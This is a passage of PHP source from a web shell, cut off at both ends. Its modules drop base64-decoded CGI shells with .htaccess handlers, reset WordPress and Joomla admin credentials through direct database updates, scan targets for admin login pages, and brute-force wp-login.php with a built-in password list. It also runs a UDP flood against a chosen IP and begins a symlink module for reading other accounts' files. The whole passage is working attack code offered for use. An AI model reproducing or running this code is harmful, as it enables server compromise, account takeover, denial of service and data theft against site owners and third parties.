dvdXQ7Cn0KJlByaW50UGFnZUZvb3Rlcjs=\';\r\n\r\n$file = fopen("cgi2012.izo" ,"w+");\r\n$write = fwrite ($file ,base64_decode($cgi2012));\r\nfclose($file);\r\n    chmod("cgi2012.izo",0755);\r\n   echo " <iframe src=cgi2012/cgi2012.izo width=96% height=76% frameborder=0></iframe>\r\n \r\n </div>"; }\r\n \r\n ///////////////////////////////////////////////////////////////////////////\r\n \r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'config\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=config" method="post">\r\n\r\n<?php\r\n\r\necho "<center/><br/><b><font color=#00ff00>+--==[ Config Shell Priv8 SCR ]==--+</font></b><br><br>";\r\n\r\n  mkdir(\'config\', 0755);\r\n    chdir(\'config\');\r\n        $kokdosya = ".htaccess";\r\n        $dosya_adi = "$kokdosya";\r\n        $dosya = fopen ($dosya_adi , \'w\') or die ("Error cuyy!");\r\n        $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI\r\n\t\t\r\nAddType application/x-httpd-cgi .cpc\r\n\r\nAddHandler cgi-script .izo\r\nAddHandler cgi-script .izo";    \r\n        fwrite ( $dosya , $metin ) ;\r\n        fclose ($dosya);\r\n\r\n$file = fopen("config.izo" ,"w+");\r\n$write = fwrite ($file ,base64_decode($configshell));\r\nfclose($file);\r\n    chmod("config.izo",0755);\r\n   echo "<iframe src=config/config.izo width=97% height=100% frameborder=0></iframe>\r\n   </div>"; \r\n}\r\n/////////////////////////////////////////////////////////////////////////\r\n\r\n\r\n///////////////////////////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'wp-reset\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=wp-reset" method="post">\r\n\r\n<?php\r\n\r\necho "<center/><br/><b><font color=#00ff00>+--==[  Wordpress Reset Password  ]==--+</font></b><br><br>";\r\n  \r\n  if(empty($_POST[\'pwd\'])){\r\n  \r\necho "<FORM method=\'POST\'>\r\n<table class=\'tabnet\' style=\'width:300px;\'> <tr><th colspan=\'2\'>Connect to mySQL server</th></tr> <tr><td>&nbsp;&nbsp;Hostname</td><td>\r\n<input style=\'width:220px;\' class=\'inputz\' type=\'text\' name=\'localhost\' value=\'localhost\' /></td></tr> <tr><td>&nbsp;&nbsp;Database</td><td>\r\n<input style=\'width:220px;\' class=\'inputz\' type=\'text\' name=\'database\' value=\'wp-\' /></td></tr> <tr><td>&nbsp;&nbsp;username</td><td>\r\n<input style=\'width:220px;\' class=\'inputz\' type=\'text\' name=\'username\' value=\'wp-\' /></td></tr> <tr><td>&nbsp;&nbsp;password</td><td>\r\n<input style=\'width:220px;\' class=\'inputz\' type=\'text\' name=\'password\' value=\'**\' /></td></tr>\r\n<tr><td>&nbsp;&nbsp;User baru</td><td>\r\n<input style=\'width:220px;\' class=\'inputz\' type=\'text\' name=\'admin\' value=\'admin\' /></td></tr>\r\n <tr><td>&nbsp;&nbsp;Pass Baru</td><td>\r\n<input style=\'width:80px;\' class=\'inputz\' type=\'text\' name=\'pwd\' value=\'123456\' />&nbsp;\r\n\r\n<input style=\'width:19%;\' class=\'inputzbut\' type=\'submit\' value=\'change!\' name=\'send\' /></FORM>\r\n</td></tr> </table><br><br><br><br>\r\n";\r\n}else{\r\n$localhost = $_POST[\'localhost\'];\r\n$database  = $_POST[\'database\'];\r\n$username  = $_POST[\'username\'];\r\n$password  = $_POST[\'password\'];\r\n$pwd   = $_POST[\'pwd\'];\r\n$admin = $_POST[\'admin\'];\r\n\r\n\r\n @mysql_connect($localhost,$username,$password) or die(mysql_error());\r\n @mysql_select_db($database) or die(mysql_error());\r\n\r\n$hash = crypt($pwd);\r\n$a4s=@mysql_query("UPDATE wp_users SET user_login =\'".$admin."\' WHERE ID = 1") or die(mysql_error());\r\n$a4s=@mysql_query("UPDATE wp_users SET user_pass =\'".$hash."\' WHERE ID = 1") or die(mysql_error());\r\n$a4s=@mysql_query("UPDATE wp_users SET user_login =\'".$admin."\' WHERE ID = 2") or die(mysql_error());\r\n$a4s=@mysql_query("UPDATE wp_users SET user_pass =\'".$hash."\' WHERE ID = 2") or die(mysql_error());\r\n$a4s=@mysql_query("UPDATE wp_users SET user_login =\'".$admin."\' WHERE ID = 3") or die(mysql_error());\r\n$a4s=@mysql_query("UPDATE wp_users SET user_pass =\'".$hash."\' WHERE ID = 3") or die(mysql_error());\r\n$a4s=@mysql_query("UPDATE wp_users SET user_email =\'".$SQL."\' WHERE ID = 1") or die(mysql_error());\r\n\r\n\r\nif($a4s){\r\necho "<b> Success ..!! :)) sekarang bisa login ke wp-admin</b> ";\r\n}\r\n\r\n}\r\n  \r\n  \r\n  echo "\r\n   </div>"; }\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'jm-reset\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=jm-reset" method="post">\r\n\r\n<?php\r\n\r\necho "<center/><br/><b><font color=#00ff00>+--==[  Joomla Reset Password ]==--+</font></b><br><br>";\r\n\tif(empty($_POST[\'pwd\'])){\r\necho "<FORM method=\'POST\'><table class=\'tabnet\' style=\'width:300px;\'> <tr><th colspan=\'2\'>Connect to mySQL </th></tr> <tr><td>&nbsp;&nbsp;Host</td><td>\r\n<input style=\'width:270px;\' class=\'inputz\' type=\'text\' name=\'localhost\' value=\'localhost\' /></td></tr> <tr><td>&nbsp;&nbsp;Database</td><td>\r\n<input style=\'width:270px;\' class=\'inputz\' type=\'text\' name=\'database\' value=\'database\' /></td></tr> <tr><td>&nbsp;&nbsp;username</td><td>\r\n<input style=\'width:270px;\' class=\'inputz\' type=\'text\' name=\'username\' value=\'db_user\' /></td></tr> <tr><td>&nbsp;&nbsp;password</td><td>\r\n<input style=\'width:270px;\' class=\'inputz\' type=\'password\' name=\'password\' value=\'**\' /></td></tr>\r\n<tr><td>&nbsp;&nbsp;User baru</td><td>\r\n<input style=\'width:270px;\' class=\'inputz\' name=\'admin\' value=\'admin\' /></td></tr>\r\n <tr><td>&nbsp;&nbsp;pass baru </td><td>123456 = \r\n<input style=\'width:130px;\' class=\'inputz\' name=\'pwd\' value=\'e10adc3949ba59abbe56e057f20f883e\' />&nbsp;\r\n\r\n<input style=\'width:23%;\' class=\'inputzbut\' type=\'submit\' value=\'change!\' name=\'send\' /></FORM>\r\n</td></tr> </table><br><br><br><br>\r\n";\r\n}else{\r\n$localhost = $_POST[\'localhost\'];\r\n$database  = $_POST[\'database\'];\r\n$username  = $_POST[\'username\'];\r\n$password  = $_POST[\'password\'];\r\n$pwd   = $_POST[\'pwd\'];\r\n$admin = $_POST[\'admin\'];\r\n@mysql_connect($localhost,$username,$password) or die(mysql_error());\r\n@mysql_select_db($database) or die(mysql_error());\r\n$hash = crypt($pwd);\r\n$SQL=@mysql_query("UPDATE jos_users SET username =\'".$admin."\' WHERE ID = 62") or die(mysql_error());\r\n$SQL=@mysql_query("UPDATE jos_users SET password =\'".$pwd."\' WHERE ID = 62") or die(mysql_error());\r\n$SQL=@mysql_query("UPDATE jos_users SET username =\'".$admin."\' WHERE ID = 63") or die(mysql_error());\r\n$SQL=@mysql_query("UPDATE jos_users SET password =\'".$pwd."\' WHERE ID = 63") or die(mysql_error());\r\n$SQL=@mysql_query("UPDATE jos_users SET username =\'".$admin."\' WHERE ID = 64") or die(mysql_error());\r\n$SQL=@mysql_query("UPDATE jos_users SET password =\'".$pwd."\' WHERE ID = 64") or die(mysql_error());\r\n$SQL=@mysql_query("UPDATE jos_users SET username =\'".$admin."\' WHERE ID = 65") or die(mysql_error());\r\n$SQL=@mysql_query("UPDATE jos_users SET password =\'".$pwd."\' WHERE ID = 65") or die(mysql_error());\r\nif($SQL){\r\necho "<b>Success : skarang password barunya >>> - (123456)";\r\n}\r\n}\r\n\t\r\n  echo "\r\n   </div>"; \r\n} \r\n//////////////////////////////////////////////////////////////////////////////\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'adfin\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=adfin" method="post">\r\n\r\n<?php\r\nset_time_limit(0);\r\nerror_reporting(0);\r\n$list[\'front\'] ="admin\r\nadm\r\nadmincp\r\nadmcp\r\ncp\r\nmodcp\r\nmoderatorcp\r\nadminare\r\nadmins\r\ncpanel\r\ncontrolpanel";\r\n$list[\'end\'] = "admin1.php\r\nadmin1.html\r\nadmin2.php\r\nadmin2.html\r\nyonetim.php\r\nyonetim.html\r\nyonetici.php\r\nyonetici.html\r\nccms/\r\nccms/login.php\r\nccms/index.php\r\nmaintenance/\r\nwebmaster/\r\nadm/\r\nconfiguration/\r\nconfigure/\r\nwebsvn/\r\nadmin/\r\nadmin/account.php\r\nadmin/account.html\r\nadmin/index.php\r\nadmin/index.html\r\nadmin/login.php\r\nadmin/login.html\r\nadmin/home.php\r\nadmin/controlpanel.html\r\nadmin/controlpanel.php\r\nadmin.php\r\nadmin.html\r\nadmin/cp.php\r\nadmin/cp.html\r\ncp.php\r\ncp.html\r\nadministrator/\r\nadministrator/index.html\r\nadministrator/index.php\r\nadministrator/login.html\r\nadministrator/login.php\r\nadministrator/account.html\r\nadministrator/account.php\r\nadministrator.php\r\nadministrator.html\r\nlogin.php\r\nlogin.html\r\nmodelsearch/login.php\r\nmoderator.php\r\nmoderator.html\r\nmoderator/login.php\r\nmoderator/login.html\r\nmoderator/admin.php\r\nmoderator/admin.html\r\nmoderator/\r\naccount.php\r\naccount.html\r\ncontrolpanel/\r\ncontrolpanel.php\r\ncontrolpanel.html\r\nadmincontrol.php\r\nadmincontrol.html\r\nadminpanel.php\r\nadminpanel.html\r\nadmin1.asp\r\nadmin2.asp\r\nyonetim.asp\r\nyonetici.asp\r\nadmin/account.asp\r\nadmin/index.asp\r\nadmin/login.asp\r\nadmin/home.asp\r\nadmin/controlpanel.asp\r\nadmin.asp\r\nadmin/cp.asp\r\ncp.asp\r\nadministrator/index.asp\r\nadministrator/login.asp\r\nadministrator/account.asp\r\nadministrator.asp\r\nlogin.asp\r\nmodelsearch/login.asp\r\nmoderator.asp\r\nmoderator/login.asp\r\nmoderator/admin.asp\r\naccount.asp\r\ncontrolpanel.asp\r\nadmincontrol.asp\r\nadminpanel.asp\r\nfileadmin/\r\nfileadmin.php\r\nfileadmin.asp\r\nfileadmin.html\r\nadministration/\r\nadministration.php\r\nadministration.html\r\nsysadmin.php\r\nsysadmin.html\r\nphpmyadmin/\r\nmyadmin/\r\nsysadmin.asp\r\nsysadmin/\r\nur-admin.asp\r\nur-admin.php\r\nur-admin.html\r\nur-admin/\r\nServer.php\r\nServer.html\r\nServer.asp\r\nServer/\r\nwp-admin/\r\nadministr8.php\r\nadministr8.html\r\nadministr8/\r\nadministr8.asp\r\nwebadmin/\r\nwebadmin.php\r\nwebadmin.asp\r\nwebadmin.html\r\nadministratie/\r\nadmins/\r\nadmins.php\r\nadmins.asp\r\nadmins.html\r\nadministrivia/\r\nDatabase_Administration/\r\nWebAdmin/\r\nuseradmin/\r\nsysadmins/\r\nadmin1/\r\nsystem-administration/\r\nadministrators/\r\npgadmin/\r\ndirectadmin/\r\nstaradmin/\r\nServerAdministrator/\r\nSysAdmin/\r\nadminister/\r\nLiveUser_Admin/\r\nsys-admin/\r\ntypo3/\r\npanel/\r\ncpanel/\r\ncPanel/\r\ncpanel_file/\r\nplatz_login/\r\nrcLogin/\r\nblogindex/\r\nformslogin/\r\nautologin/\r\nsupport_login/\r\nmeta_login/\r\nmanuallogin/\r\nsimpleLogin/\r\nloginflat/\r\nutility_login/\r\nshowlogin/\r\nmemlogin/\r\nmembers/\r\nlogin-redirect/\r\nsub-login/\r\nwp-login/\r\nlogin1/\r\ndir-login/\r\nlogin_db/\r\nxlogin/\r\nsmblogin/\r\ncustomer_login/\r\nUserLogin/\r\nlogin-us/\r\nacct_login/\r\nadmin_area/\r\nbigadmin/\r\nproject-admins/\r\nphppgadmin/\r\npureadmin/\r\nsql-admin/\r\nradmind/\r\nopenvpnadmin/\r\nwizmysqladmin/\r\nvadmind/\r\nezsqliteadmin/\r\nhpwebjetadmin/\r\nnewsadmin/\r\nadminpro/\r\nLotus_Domino_Admin/\r\nbbadmin/\r\nvmailadmin/\r\nIndy_admin/\r\nccp14admin/\r\nirc-macadmin/\r\nbanneradmin/\r\nsshadmin/\r\nphpldapadmin/\r\nmacadmin/\r\nadministratoraccounts/\r\nadmin4_account/\r\nadmin4_colon/\r\nradmind-1/\r\nSuper-Admin/\r\nAdminTools/\r\ncmsadmin/\r\nSysAdmin2/\r\nglobes_admin/\r\ncadmins/\r\nphpSQLiteAdmin/\r\nnavSiteAdmin/\r\nserver_admin_small/\r\nlogo_sysadmin/\r\nserver/\r\ndatabase_administration/\r\npower_user/\r\nsystem_administration/\r\nss_vms_admin_sm/\r\nadminarea/\r\nbb-admin/\r\nadminLogin/\r\npanel-administracion/\r\ninstadmin/\r\nmemberadmin/\r\nadministratorlogin/\r\nadmin/admin.php\r\nadmin_area/admin.php\r\nadmin_area/login.php\r\nsiteadmin/login.php\r\nsiteadmin/index.php\r\nsiteadmin/login.html\r\nadmin/admin.html\r\nadmin_area/index.php\r\nbb-admin/index.php\r\nbb-admin/login.php\r\nbb-admin/admin.php\r\nadmin_area/login.html\r\nadmin_area/index.html\r\nadmincp/index.asp\r\nadmincp/login.asp\r\nadmincp/index.html\r\nwebadmin/index.html\r\nwebadmin/admin.html\r\nwebadmin/login.html\r\nadmin/admin_login.html\r\nadmin_login.html\r\npanel-administracion/login.html\r\nnsw/admin/login.php\r\nwebadmin/login.php\r\nadmin/admin_login.php\r\nadmin_login.php\r\nadmin_area/admin.html\r\npages/admin/admin-login.php\r\nadmin/admin-login.php\r\nadmin-login.php\r\nbb-admin/index.html\r\nbb-admin/login.html\r\nbb-admin/admin.html\r\nadmin/home.html\r\npages/admin/admin-login.html\r\nadmin/admin-login.html\r\nadmin-login.html\r\nadmin/adminLogin.html\r\nadminLogin.html\r\nhome.html\r\nrcjakar/admin/login.php\r\nadminarea/index.html\r\nadminarea/admin.html\r\nwebadmin/index.php\r\nwebadmin/admin.php\r\nuser.html\r\nmodelsearch/login.html\r\nadminarea/login.html\r\npanel-administracion/index.html\r\npanel-administracion/admin.html\r\nmodelsearch/index.html\r\nmodelsearch/admin.html\r\nadmincontrol/login.html\r\nadm/index.html\r\nadm.html\r\nuser.php\r\npanel-administracion/login.php\r\nwp-login.php\r\nadminLogin.php\r\nadmin/adminLogin.php\r\nhome.php\r\nadminarea/index.php\r\nadminarea/admin.php\r\nadminarea/login.php\r\npanel-administracion/index.php\r\npanel-administracion/admin.php\r\nmodelsearch/index.php\r\nmodelsearch/admin.php\r\nadmincontrol/login.php\r\nadm/admloginuser.php\r\nadmloginuser.php\r\nadmin2/login.php\r\nadmin2/index.php\r\nadm/index.php\r\nadm.php\r\naffiliate.php\r\nadm_auth.php\r\nmemberadmin.php\r\nadministratorlogin.php\r\nadmin/admin.asp\r\nadmin_area/admin.asp\r\nadmin_area/login.asp\r\nadmin_area/index.asp\r\nbb-admin/index.asp\r\nbb-admin/login.asp\r\nbb-admin/admin.asp\r\npages/admin/admin-login.asp\r\nadmin/admin-login.asp\r\nadmin-login.asp\r\nuser.asp\r\nwebadmin/index.asp\r\nwebadmin/admin.asp\r\nwebadmin/login.asp\r\nadmin/admin_login.asp\r\nadmin_login.asp\r\npanel-administracion/login.asp\r\nadminLogin.asp\r\nadmin/adminLogin.asp\r\nhome.asp\r\nadminarea/index.asp\r\nadminarea/admin.asp\r\nadminarea/login.asp\r\npanel-administracion/index.asp\r\npanel-administracion/admin.asp\r\nmodelsearch/index.asp\r\nmodelsearch/admin.asp\r\nadmincontrol/login.asp\r\nadm/admloginuser.asp\r\nadmloginuser.asp\r\nadmin2/login.asp\r\nadmin2/index.asp\r\nadm/index.asp\r\nadm.asp\r\naffiliate.asp\r\nadm_auth.asp\r\nmemberadmin.asp\r\nadministratorlogin.asp\r\nsiteadmin/login.asp\r\nsiteadmin/index.asp\r\nADMIN/\r\npaneldecontrol/\r\nlogin/\r\ncms/\r\nadmon/\r\nADMON/\r\nadministrador/\r\nADMIN/login.php\r\npanelc/\r\nADMIN/login.html";\r\nfunction template() {\r\necho \'\r\n\r\n<script type="text/javascript">\r\n<!--\r\nfunction insertcode($text, $place, $replace)\r\n{\r\n    var $this = $text;\r\n    var logbox = document.getElementById($place);\r\n    if($replace == 0)\r\n        document.getElementById($place).innerHTML = logbox.innerHTML+$this;\r\n    else\r\n        document.getElementById($place).innerHTML = $this;\r\n//document.getElementById("helpbox").innerHTML = $this;\r\n}\r\n-->\r\n</script>\r\n<br>\r\n<br>\r\n<h1 class="technique-two">\r\n       \r\n\r\n\r\n</h1>\r\n\r\n<div class="wrapper">\r\n<div class="red">\r\n<div class="tube">\r\n<center><table class="tabnet"><th colspan="2">Admin Finder</th><tr><td>\r\n<form action="" method="post" name="xploit_form">\r\n\r\n<tr>\r\n<tr>\r\n\t<b><td>URL</td>\r\n\t<td><input class="inputz" type="text" name="xploit_url" value="\'.$_POST[\'xploit_url\'].\'" style="width: 350px;" />\r\n\t</td>\r\n</tr><tr>\r\n\t<td>404 string</td>\r\n\t<td><input class="inputz" type="text" name="xploit_404string" value="\'.$_POST[\'xploit_404string\'].\'" style="width: 350px;" />\r\n\t</td></b>\r\n</tr><br><td>\r\n<span style="float: center;"><input class="inputzbut" type="submit" name="xploit_submit" value=" Start Scan" align="center" />\r\n</span></td></tr>\r\n</form></td></tr>\r\n<br /></table>\r\n</div> <!-- /tube -->\r\n</div> <!-- /red -->\r\n<br />\r\n<div class="green">\r\n<div class="tube" id="rightcol">\r\nVerificat: <span id="verified">0</span> / <span id="total">0</span><br />\r\n<b>Found ones:<br /></b>\r\n</div> <!-- /tube -->\r\n</div></center><!-- /green -->\r\n<br clear="all" /><br />\r\n<div class="blue">\r\n<div class="tube" id="logbox">\r\n<br />\r\n<br />\r\nAdmin page Finder :<br /><br />\r\n</div> <!-- /tube -->\r\n</div> <!-- /blue -->\r\n</div> <!-- /wrapper -->\r\n<br clear="all"><br>\';\r\n}\r\nfunction show($msg, $br=1, $stop=0, $place=\'logbox\', $replace=0) {\r\n    if($br == 1) $msg .= "<br />";\r\n    echo "<script type=\\"text/javascript\\">insertcode(\'".$msg."\', \'".$place."\', \'".$replace."\');</script>";\r\n    if($stop == 1) exit;\r\n    @flush();@ob_flush();\r\n}\r\nfunction check($x, $front=0) {\r\n    global $_POST,$site,$false;\r\n    if($front == 0) $t = $site.$x;\r\n    else $t = \'http://\'.$x.\'.\'.$site.\'/\';\r\n    $headers = get_headers($t);\r\n    if (!eregi(\'200\', $headers[0])) return 0;\r\n    $data = @file_get_contents($t);\r\n    if($_POST[\'xploit_404string\'] == "") if($data == $false) return 0;\r\n    if($_POST[\'xploit_404string\'] != "") if(strpos($data, $_POST[\'xploit_404string\'])) return 0;\r\n    return 1;\r\n}\r\n   \r\n// --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\r\ntemplate();\r\nif(!isset($_POST[\'xploit_url\'])) die;\r\nif($_POST[\'xploit_url\'] == \'\') die;\r\n$site = $_POST[\'xploit_url\'];\r\nif ($site[strlen($site)-1] != "/") $site .= "/";\r\nif($_POST[\'xploit_404string\'] == "") $false = @file_get_contents($site."d65897f5380a21a42db94b3927b823d56ee1099a-this_can-t_exist.html");\r\n$list[\'end\'] = str_replace("\\r", "", $list[\'end\']);\r\n$list[\'front\'] = str_replace("\\r", "", $list[\'front\']);\r\n$pathes = explode("\\n", $list[\'end\']);\r\n$frontpathes = explode("\\n", $list[\'front\']);\r\nshow(count($pathes)+count($frontpathes), 1, 0, \'total\', 1);\r\n$verificate = 0;\r\nforeach($pathes as $path) {\r\n    show(\'Checking \'.$site.$path.\' : \', 0, 0, \'logbox\', 0);\r\n    $verificate++; show($verificate, 0, 0, \'verified\', 1);\r\n    if(check($path) == 0) show(\'not found\', 1, 0, \'logbox\', 0);\r\n    else{\r\n        show(\'<span style="color: #00FF00;"><strong>found</strong></span>\', 1, 0, \'logbox\', 0);\r\n        show(\'<a href="\'.$site.$path.\'">\'.$site.$path.\'</a>\', 1, 0, \'rightcol\', 0);\r\n    }\r\n}\r\npreg_match("/\\/\\/(.*?)\\//i", $site, $xx); $site = $xx[1];\r\nif(substr($site, 0, 3) == "www") $site = substr($site, 4);\r\nforeach($frontpathes as $frontpath) {\r\n    show(\'Checking http://\'.$frontpath.\'.\'.$site.\'/ : \', 0, 0, \'logbox\', 0);\r\n    $verificate++; show($verificate, 0, 0, \'verified\', 1);\r\n    if(check($frontpath, 1) == 0) show(\'not found\', 1, 0, \'logbox\', 0);\r\n    else{\r\n        show(\'<span style="color: #00FF00;"><strong>found</strong></span>\', 1, 0, \'logbox\', 0);\r\n        show(\'<a href="http://\'.$frontpath.\'.\'.$site.\'/">\'.$frontpath.\'.\'.$site.\'</a>\', 1, 0, \'rightcol\', 0);\r\n    }\r\n   \r\n}\r\n}\r\n//////////////////////////////////////////////////////////////////////////////\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'wpbrute\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=wpbrute" method="post">\r\n<center>\r\n<br><Br><b><font size=\'2\' >+--=[ Wordpress Brute Force ]=--+</font><br>\r\n<center><p>Tanks To <a href="https://www.facebook.com/anton115" target="_blank">Cah_bagus</a></p></b></center>\r\n<form enctype="multipart/form-data" method="POST">\r\n  <table width=\'624\' border=\'0\' class=\'tabnet\' id=\'Box\'>\r\n  <tr><th colspan="5">Wordpress Brute Force</th></tr>\r\n    \r\n\r\n    <tr>\r\n      <td >&nbsp;</td>\r\n      <td ><p>Hosts:</p></td>\r\n      <td ><p> Users:</p></td>\r\n      <td ><p>Passwords:</p></td>\r\n    </tr>\r\n    <tr>\r\n      <td>&nbsp;</td>\r\n      <td ><textarea style="background:black;" name="hosts" cols="30" rows="10" ><?php if($_POST){echo $_POST[\'hosts\'];} ?></textarea></td>\r\n      <td ><textarea style="background:black;" name="usernames" cols="30" rows="10"  ><?php if($_POST){echo $_POST[\'usernames\'];}else {echo "admin";} ?></textarea></td>\r\n      <td ><textarea style="background:black;" name="passwords" cols="30" rows="10"  ><?php if($_POST){echo $_POST[\'passwords\'];}else {echo "admin\\nadministrator\\n123123\\n123321\\n123456\\n1234567\\n12345678\\n123456789\\n123456123456\\nadmin2010\\nadmin2011\\npassword\\nP@ssW0rd\\n!@#$%^\\n!@#$%^&*(\\n(*&^%$#@!\\n111111\\n222222\\n333333\\n444444\\n555555\\n666666\\n777777\\n888888\\n999999";} ?></textarea></td>\r\n    </tr>\r\n<tr><td colspan="4"><input class=\'inputzbut\' type="submit" name="submit" value="Brute Now"  />\r\n<?php\r\nif($_POST)\r\n{\r\n\t$hosts = trim(filter($_POST[\'hosts\']));\r\n\t$passwords = trim(filter($_POST[\'passwords\']));\r\n\t$usernames = trim(filter($_POST[\'usernames\']));\r\n\r\n\tif($passwords && $usernames && $hosts)\r\n\t{\r\n\t\t$hosts_explode = explode("\\n", $hosts);\r\n\t\t$usernames_explode = explode("\\n", $usernames);\r\n    \t$passwords_explode = explode("\\n", $passwords);\r\n\r\n\t\tforeach($hosts_explode as $host)\r\n\t\t{\r\n\t\t\t$host = RemoveLastSlash($host);\r\n\t\t\t$hacked = 0;\r\n\t\t\t$host = str_replace(array("http://","https://","www."),"",trim($host));\r\n\t\t\t$host = "http://".$host;\r\n\t\t\t$wpAdmin = $host.\'/wp-admin/\';\r\n\r\n\t\t\tif(!url_exists($host."/wp-login.php"))\r\n\t\t\t{echo "<p>".$host." => <font color=\'red\'>Error In Login Page !</font></p>";ob_flush();flush();continue;}\r\n\r\n\t\t\tforeach($usernames_explode as $username)\r\n\t\t\t{\r\n\t\t\t\tforeach($passwords_explode as $password)\r\n\t\t\t\t{\r\n\t\t\t\t\t$ch   =     curl_init();\r\n\t\t\t\t\tcurl_setopt($ch,CURLOPT_RETURNTRANSFER,1);\r\n\t\t\t\t\tcurl_setopt($ch,CURLOPT_URL,$host.\'/wp-login.php\');\r\n\t\t\t\t\tcurl_setopt($ch,CURLOPT_COOKIEJAR,"coki.txt");\r\n\t\t\t\t\tcurl_setopt($ch,CURLOPT_COOKIEFILE,"coki.txt");\r\n\t\t\t\t\tcurl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);\r\n\t\t\t\t\tcurl_setopt($ch,CURLOPT_POST,TRUE);\r\n\t\t\t\t\tcurl_setopt($ch,CURLOPT_POSTFIELDS,"log=".$username."&pwd=".$password."&wp-submit=Giri&#8207;"."&redirect_to=".$wpAdmin."&testcookie=1");\r\n\t\t\t\t\t$login    =\t   curl_exec($ch);\r\n\r\n\t\t\t\t\tif(eregi ("profile.php",$login) )\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t$hacked = 1;\r\n\t\t\t\t\t\techo "<p>".$host." => UserName : [<font color=\'green\'>".$username."</font>] : Password : [<font color=\'green\'>".$password."</font>]</p>";\r\n\t\t\t\t\t\tob_flush();flush();break;\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\tif($hacked == 1){break;}\r\n\t\t\t}\r\n\t\t\tif($hacked == 0)\r\n\t\t\t{echo "<p>".$host." => <font color=\'red\'>Failed !</font></p>";ob_flush();flush();}\r\n\t\t}\r\n\t}\r\n\telse {echo "<p><font color=\'red\'>All fields are Required ! </font></p>";}\r\n}\r\n?>\r\n</td></tr>\r\n</table></form></center>\r\n<?php\r\nfunction url_exists($strURL)\r\n{\r\n    $resURL = curl_init();\r\n    curl_setopt($resURL, CURLOPT_URL, $strURL);\r\n    curl_setopt($resURL, CURLOPT_BINARYTRANSFER, 1);\r\n    curl_setopt($resURL, CURLOPT_HEADERFUNCTION, \'curlHeaderCallback\');\r\n    curl_setopt($resURL, CURLOPT_FAILONERROR, 1);\r\n    curl_exec ($resURL);\r\n    $intReturnCode = curl_getinfo($resURL, CURLINFO_HTTP_CODE);\r\n    curl_close ($resURL);\r\n    if ($intReturnCode != 200){return false;}\r\n\telse{return true ;}\r\n}\r\nfunction filter($string)\r\n{\r\n\tif(get_magic_quotes_gpc() != 0){return stripslashes($string);\t}\r\n\telse{return $string;\t}\r\n}\r\nfunction RemoveLastSlash($host)\r\n{\r\n\tif(strrpos($host, \'/\', -1) == strlen($host)-1)\r\n\t{return substr($host,0,strrpos($host, \'/\', -1));}\r\n\telse{return $host;}\r\n}\r\necho "</p>";\r\n}\r\n\r\n\r\n//////////////////////////////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'dos\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=dos" method="post">\r\n<center><br><br><br>\r\nYour IP: <font color="red"><b><?php echo $my_ip; ?></b></font>&nbsp;(Don\'t DoS yourself nub)<br><br>\r\n<table class="tabnet" style="width:333px;padding:0 1px;">\r\n<th colspan="5">Ddos Tool</th>\r\n<tr><tr><td>IP Target</td><td>:</td>\r\n<td><input type="text" class="inputz" name="ip" size="48" maxlength="25"  value = "0.0.0.0" onblur = "if ( this.value==\'\' ) this.value = \'0.0.0.0\';" onfocus = " if ( this.value == \'0.0.0.0\' ) this.value = \'\';"/>\r\n</td></tr>\r\n<tr><td>Time</td><td>:</td>\r\n<td><input type="text" class="inputz" name="time" size="48" maxlength="25"  value = "time (in seconds)" onblur = "if ( this.value==\'\' ) this.value = \'time (in seconds)\';" onfocus = " if ( this.value == \'time (in seconds)\' ) this.value = \'\';"/>\r\n</td></tr>\r\n\r\n<tr><td>Port</td><td>:</td>\r\n<td><input type="text" class="inputz" name="port" size="48" maxlength="5"  value = "port" onblur = "if ( this.value==\'\' ) this.value = \'port\';" onfocus = " if ( this.value == \'port\' ) this.value = \'\';"/>\r\n</td></tr></tr></table></b><br>\r\n<input type="submit" class="inputzbut" name="fire" value="  Firee !!!   ">\r\n<br><br>\r\n<center>\r\nAfter initiating the DoS attack, please wait while the browser loads.\r\n</center>\r\n\r\n</form>\r\n</center>\r\n<?php\r\n$submit = $_POST[\'fire\'];\r\nif (isset($submit)) {\r\n\r\n$packets = 0;\r\n$ip = $_POST[\'ip\'];\r\n$rand = $_POST[\'port\'];\r\nset_time_limit(0);\r\nignore_user_abort(FALSE);\r\n\r\n$exec_time = $_POST[\'time\'];\r\n\r\n$time = time();\r\nprint "Flooded: $ip on port $rand <br><br>";\r\n$max_time = $time+$exec_time;\r\n\r\n\r\n\r\nfor($i=0;$i<65535;$i++){\r\n        $out .= "X";\r\n}\r\nwhile(1){\r\n$packets++;\r\n        if(time() > $max_time){\r\n                break;\r\n        }\r\n        \r\n        $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);\r\n        if($fp){\r\n                fwrite($fp, $out);\r\n                fclose($fp);\r\n        }\r\n}\r\necho "Packet complete at ".time(\'h:i:s\')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \\n";\r\n}\r\n}\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'symlink\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=symlink" method="post">\r\n\r\n<?php   \r\n\r\n@set_time_limit(0);\r\n\r\necho "<br><br><center><h1>+--=[ Symlink ]=--+</h1></center><br><br><center><div class=content>";\r\n\r\n@mkdir(\'sym\',0777);\r\n$htaccess  = "Options all \\n DirectoryIndex Sux.html \\n AddType text/plain .php \\n AddHandler server-parsed .php \\n  AddType text/plain .html \\n 